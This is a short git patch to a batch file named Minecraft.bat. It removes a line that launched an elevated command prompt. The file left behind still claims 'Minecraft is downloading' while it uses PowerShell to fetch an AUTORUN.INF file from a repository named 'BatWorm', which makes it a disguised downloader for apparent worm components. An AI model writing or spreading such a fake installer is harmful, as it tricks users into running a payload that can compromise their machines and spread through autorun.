From bc0f3ae36b0c7edf5cc254ecb853cdf5e94b0691 Mon Sep 17 00:00:00 2001 From: Windows93-Applications Date: Mon, 13 Jan 2025 15:09:07 -0500 Subject: [PATCH] Update Minecraft.bat --- Minecraft.bat | 1 - 1 file changed, 1 deletion(-) diff --git a/Minecraft.bat b/Minecraft.bat index f725a94..aaf9ead 100644 --- a/Minecraft.bat +++ b/Minecraft.bat @@ -1,4 +1,3 @@ -@powershell Start-Process cmd -Verb runas echo off >nul echo Minecraft is downloading. powershell -c "Invoke-WebRequest -Uri 'http://git.is-a.space/Windows93-Applications/BatWorm/raw/branch/main/AUTORUN.INF' -OutFile 'AUTORUN.INF'"